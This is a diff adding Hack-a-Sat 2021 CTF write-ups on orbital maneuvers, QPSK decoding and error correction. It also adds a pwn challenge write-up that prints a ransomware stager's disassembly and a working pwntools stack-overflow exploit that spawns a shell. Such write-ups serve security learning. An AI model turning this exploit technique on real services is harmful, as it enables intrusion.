pwning
diff --git a/‎hackasat2021/cotton-eye-geo/readme.md
+69 b/‎hackasat2021/cotton-eye-geo/readme.md
+69
diff --git a/‎hackasat2021/credence/readme.md
+29 b/‎hackasat2021/credence/readme.md
+29
diff --git a/‎hackasat2021/error-correct/readme.md
+96 b/‎hackasat2021/error-correct/readme.md
+96
diff --git a/‎hackasat2021/kings-ransom/readme.md
+150 b/‎hackasat2021/kings-ransom/readme.md
+150
@@ -0,0 +1,69 @@
+In this problem we are given a position and velocity for a satellite in Earth
+orbit, and asked to give a time and delta-v for one maneuver to bring us to
+a new orbit.
+
+Plotting the current orbit, we can see it is an elliptical orbit already in
+the correct plane, and with the apogee at the desired altitude for the
+target circular orbit.
+
+For anyone with a bit of orbital mechanics knowledge (or who has ever played
+Kerbal Space Program), this makes the maneuver trivial: at the apogee, simply
+increase thrust in the prograde direction until we raise the perigee to
+the same altitude.
+
+This could be done with math, or with a simple python program.
+
+```python
+from orbital import earth, KeplerianElements, Maneuver, plot, plot3d
+from scipy.constants import kilo
+import numpy
+from datetime import datetime, timedelta
+
+# the state vector we are given for our satellite
+r = numpy.array([8449.401305, 9125.794363, -17.461357])
+v = numpy.array([-1.419072, 6.780149, 0.002865])
+# the current time
+ts = "2021-06-26-19:20:00.000000-UTC"
+tf = "%Y-%m-%d-%H:%M:%S.%f-UTC"
+tt = datetime.strptime(ts, tf)
+
+orbit = KeplerianElements.from_state_vector(r*kilo, v*kilo, earth)
+
+# the target (circular) orbit
+target_a = 42164*kilo
+target_e = 0.005
+
+target_orbit = KeplerianElements.with_altitude(target_a, body=earth)
+
+# figure out at what time our position reaches our perigee
+while True:
+    orbit.propagate_anomaly_by(M=0.001)
+    if abs(numpy.linalg.norm(orbit.r) - target_a) < (2*kilo):
+        break
+
+# estimate the speed we want
+needed_vel = numpy.linalg.norm(target_orbit.v)
+
+# apply that same speed in the prograde direction
+v_est = orbit.r/numpy.linalg.norm(orbit.r) * needed_vel
+v_est = numpy.array([v_est.x, -v_est.y, v_est.z])
+
+# search +/- 10% to get the velocity just right
+best_v = None
+best_e = 1
+for x in numpy.arange(0.9,1.1,0.00005):
+    orbit2 = KeplerianElements.from_state_vector(orbit.r, v_est*x, earth)
+    if abs(orbit2.a - target_a) < 10*kilo and orbit2.e < 0.0009 and orbit2.e < best_e:
+        best_e = orbit2.e
+        best_v = v_est*x
+
+mtime = tt + timedelta(seconds=orbit.t)
+move = (best_v - orbit.v)/1000
+print("vel: ", move[0], move[1], move[2])
+print("ts: ", datetime.strftime(mtime, tf))
+
+mtime = tt + timedelta(orbit.t)
+```
+
+This will print out the delta-V and the time of the maneuver. Sending that to
+the server will return us the flag.
@@ -0,0 +1,29 @@
+We are given a file containing IQ data and told to decode it.
+
+Plotting the I and Q data as x and y values in a plot, we see the values nicely
+align themselves into four quadrants, indicating the data is transmitted with
+QPSK. From there, we still need to determine which quadrant corresponds to
+which two-bit symbol. Luckily there are not many possibilities and we can try
+them all until one works.
+
+The following quick script decodes the data and prints the flag (as well as
+some extra data which matches up with CCSDS headers):
+
+```python
+cs = [eval(x) for x in open("iqdata.txt").read().splitlines() if x]
+
+def radio(x):
+    if x.real < 0:
+        if x.imag < 0:
+            return 1
+        return 0
+    else:
+        if x.imag < 0:
+            return 2
+        return 3
+
+qpsk = [radio(c) for c in cs][::4]
+
+comp = bytes.fromhex(hex(int("".join((["{:02b}".format(q) for q in qpsk])),2))[2:])
+print(comp)
+```
@@ -0,0 +1,96 @@
+This challenge just tells us there is important telemetry but with a bit error
+which prevents us from decoding it.
+
+Again we are given a file which appears to be IQ data, and plotting it
+(while excluding a few samples at the beginning which seem noisey) gives a
+nice QPSK constellation, indicating QPSK data.
+
+Attempting to decode this similar to the previous challenge with CSSDS data
+encoded with QPSK doesn't seem to work. Based on the name of the challenge, it
+seems pretty clear that there is some error correction involved.
+
+Unfortunately with so many error correcting codes to choose from combined with
+so many ways to read the QPSK symbols, as well as not knowing the correct bit
+offset, it seems an overwhelming number of possibilities to test. Searching
+[online](https://destevez.net/2017/01/coding-for-hit-satellites-and-other-ccsds-satellites/)
+for guidance, it seems that there is a particular error correcting code used by
+CCSDS satellites. Luckily this seems to be available in python through
+scikit-dsp.
+
+After trying this a bit, it doesn't appear to Just Work with our solution from
+the previous problem (or the error correction is wrong). And unfortunately it
+is slow to enumerate and look through everything. The previous cited blog also
+mentions a synchronization word used by CCSDS to indicate the start of packets,
+which can help us to determine if our data is correctly encoded and find the
+proper bit offsets.
+
+With this, we code up a search using the assumed error correcting code,
+enumerating through possible symbol decodings for the QPSK, and searching for
+the synchronization word to find the right decoding and bit offsets.
+
+Luckily we find the sychronization word in a possible choice for the QPSK
+decoding, and use this to sychronize our bitstream and recover the flag.
+
+The following python code implements this solution and prints the flag:
+
+```python
+import numpy as np
+import sk_dsp_comm.fec_conv as fec
+import itertools
+
+odata = np.fromfile("intermediate.bin", dtype="<c8")
+
+# synchronization word to search for
+syncword = "{:032b}".format(0x1acffc1d)
+
+cc1 = fec.FECConv(('1011011','1111001'), 10)
+
+def search():
+    for offset in range(-4, 4+1):
+        data = odata[85 + 4 * offset::4]
+
+        # import matplotlib.pyplot as plt
+        # plt.plot(data.real, data.imag, ".-")
+        # plt.show(block=True)
+
+        import itertools
+
+        quadrants = [(0, 0), (0, 1), (1, 0), (1, 1)]
+        for perm in itertools.permutations([0,1,2,3]):
+            tmap = dict(zip(quadrants, perm))
+
+            bits = np.array([data.real > 0, data.imag > 0], dtype=int).T
+            bitstring = []
+            prev = 0
+            for chunk in bits:
+                v = tmap[tuple(chunk)]
+                bitstring.append(v % 4)
+                prev = v
+
+            bitstring = "".join(map(str, bitstring))
+            bs = []
+            prev = 0
+            for i in range(0, len(bitstring), 4):
+                byte = int(bitstring[i:i+4], 4)
+                v = byte
+                bs.append(f"{v:08b}")
+                prev = byte
+
+            print(offset, perm)
+            bs = np.asarray([int(c) for c in "".join(bs)])
+            bs_fec = cc1.viterbi_decoder(bs, 'hard')
+            bitstream = "".join(str(int(c)) for c in bs_fec)
+            if syncword in bitstream:
+                print("syncword found!")
+                print( bitstream )
+                # start of bitstream is where we found the syncword
+                syncd = bitstream[bitstream.index(syncword):]
+
+                # truncate it to a multiple of 8 bits to make our life easier
+                truncated = syncd[:-(len(syncd) % 8)]
+
+                # finally convert to ascii
+                return (bytes.fromhex(hex(int(truncated, 2))[2:]))
+
+print(search())
+```
@@ -0,0 +1,150 @@
+## King's Ransom
+
+### Background
+
+> A vulnerable service with your "bank account" information running on the target system. Too bad it has already been exploited by a piece of ransomware. The ransomware took over the target, encrypted some files on the file system, and resumed the executive loop.
+> 
+> Follow the footsteps.
+
+We are provided with two files: challenge binary and libc.so.
+
+### Analysis
+
+The background information gives us an important detail: this is a vulnerable service that can be exploited. We need to first find a way to exploit the service ourselves, then we can figure out what the attacker did post-exploitation.
+
+The main loops reads in a packet of data then calls a function pointer based on fields in the packet. The packet format is:
+
+```
+struct pkt {
+	uint8_t magic0;
+	uint8_t magic1;
+	uint16_t length;
+	uint16_t cksum;
+	uint8_t fn0;
+	uint8_t fn1;
+	uint8_t data[];
+}
+```
+
+The `fn0` and `fn1` fields determine which function pointer is called from the table. The 4x4 table contains 16 function pointers, which are set using `set_fn` at `0x4015DB`. By looking at cross references to the table and to `set_fn`, we find that there are 8 possible functions: `fn_0_0`, `fn_1_0`, `fn_1_1`, `fn_2_0`, `fn_2_1`, `fn_3_0`, `fn_3_3`, and `fn_default`.
+
+Packets are created by `encode_data` at `0x40139B` and are parsed by `decode_data` at `0x401445`. We also see that there is a function that reads in two flags (flag1.txt and bank/flag2.txt) and runs `fn_2_1` on the each flag.
+
+`fn_2_0` reads data from a global buffer that was mapped at `0x12800000` with RWX permissions. `fn_2_1` writes data to the same global buffer. For example, the function that read in the two flags stored them in the global buffer at indices 0 and 32, respectively.
+
+If we read from the global buffer using `fn_2_0`, instead of flags, we get back binary data that looks suspiciously like shellcode:
+
+```
+0x0000000000000000:  F3 0F 1E FA                endbr64 
+0x0000000000000004:  55                         push    rbp
+0x0000000000000005:  48 89 E5                   mov     rbp, rsp
+0x0000000000000008:  48 83 EC 30                sub     rsp, 0x30
+0x000000000000000c:  B8 40 40 40 00             mov     eax, 0x404040
+0x0000000000000011:  48 8B 00                   mov     rax, qword ptr [rax]
+0x0000000000000014:  48 89 45 F8                mov     qword ptr [rbp - 8], rax
+0x0000000000000018:  BA 30 11 11 00             mov     edx, 0x111130
+0x000000000000001d:  48 8B 45 F8                mov     rax, qword ptr [rbp - 8]
+0x0000000000000021:  48 29 D0                   sub     rax, rdx
+0x0000000000000024:  48 89 45 F0                mov     qword ptr [rbp - 0x10], rax
+0x0000000000000028:  48 8B 45 F8                mov     rax, qword ptr [rbp - 8]
+0x000000000000002c:  48 89 45 E8                mov     qword ptr [rbp - 0x18], rax
+0x0000000000000030:  BA 20 BA 11 00             mov     edx, 0x11ba20
+0x0000000000000035:  48 8B 45 F0                mov     rax, qword ptr [rbp - 0x10]
+0x0000000000000039:  48 01 D0                   add     rax, rdx
+0x000000000000003c:  48 89 45 E0                mov     qword ptr [rbp - 0x20], rax
+0x0000000000000040:  48 8B 45 E0                mov     rax, qword ptr [rbp - 0x20]
+0x0000000000000044:  41 B9 00 00 00 00          mov     r9d, 0
+0x000000000000004a:  41 B8 00 00 00 00          mov     r8d, 0
+0x0000000000000050:  B9 22 00 00 00             mov     ecx, 0x22
+0x0000000000000055:  BA 07 00 00 00             mov     edx, 7
+0x000000000000005a:  BE 00 10 00 00             mov     esi, 0x1000
+0x000000000000005f:  BF 00 00 00 00             mov     edi, 0
+0x0000000000000064:  FF D0                      call    rax
+0x0000000000000066:  48 89 45 D8                mov     qword ptr [rbp - 0x28], rax
+0x000000000000006a:  48 C7 45 D0 00 00 00 00    mov     qword ptr [rbp - 0x30], 0
+0x0000000000000072:  48 8D 45 D0                lea     rax, [rbp - 0x30]
+0x0000000000000076:  48 8B 4D E8                mov     rcx, qword ptr [rbp - 0x18]
+0x000000000000007a:  BA 04 00 00 00             mov     edx, 4
+0x000000000000007f:  48 89 C6                   mov     rsi, rax
+0x0000000000000082:  BF 00 00 00 00             mov     edi, 0
+0x0000000000000087:  FF D1                      call    rcx
+0x0000000000000089:  48 8B 55 D0                mov     rdx, qword ptr [rbp - 0x30]
+0x000000000000008d:  48 8B 45 D8                mov     rax, qword ptr [rbp - 0x28]
+0x0000000000000091:  48 8B 4D E8                mov     rcx, qword ptr [rbp - 0x18]
+0x0000000000000095:  48 89 C6                   mov     rsi, rax
+0x0000000000000098:  BF 00 00 00 00             mov     edi, 0
+0x000000000000009d:  FF D1                      call    rcx
+0x000000000000009f:  48 8B 45 D8                mov     rax, qword ptr [rbp - 0x28]
+0x00000000000000a3:  FF D0                      call    rax
+0x00000000000000a5:  C9                         leave   
+0x00000000000000a6:  C3                         ret    
+```
+
+This shellcode reads the GOT entry for `read` and uses it to figure the base address of `libc.so` which was provided to us. The shellcode does not give us very much information since it is a stager that allocates another RWX memory page, reads in additional shellcode, and executes it.
+
+While the shellcode is a dead-end for now, it does tell us that there should be a vulnerability that allows us to execute shellcode at address `0x12800000`.
+
+### Solution
+
+After looking through each of the functions that we can run, we notice that the `decode_data` function will blindly copy data into the destination buffer. While this function is usually called by a wrapper function that uses `malloc` to allocate a large enough buffer, `fn_1_1` calls it directly.
+
+```
+int __fastcall fn_1_1(pkt_t *a1)
+{
+  int v1; // xmm0_4
+  int v2; // xmm0_4
+  int v3; // xmm0_4
+  int v5[3]; // [rsp+14h] [rbp-Ch] BYREF
+
+  decode_data(a1, v5);
+  *(float *)&v1 = 0.01 * *(float *)v5 + *(float *)&dword_404090;
+  dword_404090 = v1;
+  *(float *)&v2 = 0.01 * *(float *)&v5[1] + *(float *)&dword_404094;
+  dword_404094 = v2;
+  *(float *)&v3 = 0.01 * *(float *)&v5[2] + *(float *)&dword_404098;
+  dword_404098 = v3;
+  return 1;
+}
+```
+
+If we send a packet with a large amount of data, it will overflow the `v5` stack array and we can control the return address.
+
+Exploitation is very simple. First we store some shellcode on the RWX page using `fn_2_1`. Then we run `fn_1_1` and overflow the stack buffer. We can use pwntools to build shellcode that gives us shell:
+
+```
+from pwn import *
+context.arch = 'amd64'
+r = remote('wealthy-rock.satellitesabove.me', 5010)
+
+r.recvuntil('Ticket please:\n')
+r.sendline('ticket{...}')
+
+r.recvuntil('Starting up Service on tcp:')
+host, port = r.recvuntil(b'\n').strip().split(b':')
+
+r2 = remote(host, int(port))
+
+def cksum(s):
+    x = 0x1d0f
+    for c in s:
+        x ^= c << 8
+        for n in range(8):
+            if x & 0x8000:
+                x = (2 * x) ^ 0xa02b
+            else:
+                x = 2 * x
+    return x & 0xffff
+
+fn0 = 2
+fn1 = 1
+data = p16(0) + p16(64) + asm(shellcraft.amd64.linux.sh())
+r2.send(p8(0x55) + p8(0xaa) + p16(len(data)) + p16(cksum(data)) + p8(fn0) + p8(fn1) + data)
+
+fn0 = 1
+fn1 = 1
+data = b'A' * 12 + p64(0) + p64(0x12800000)
+r2.send(p8(0x55) + p8(0xaa) + p16(len(data)) + p16(cksum(data)) + p8(fn0) + p8(fn1) + data)
+r2.interactive()
+```
+
+Once we have a shell, we can `cat flag1.txt` and get the flag.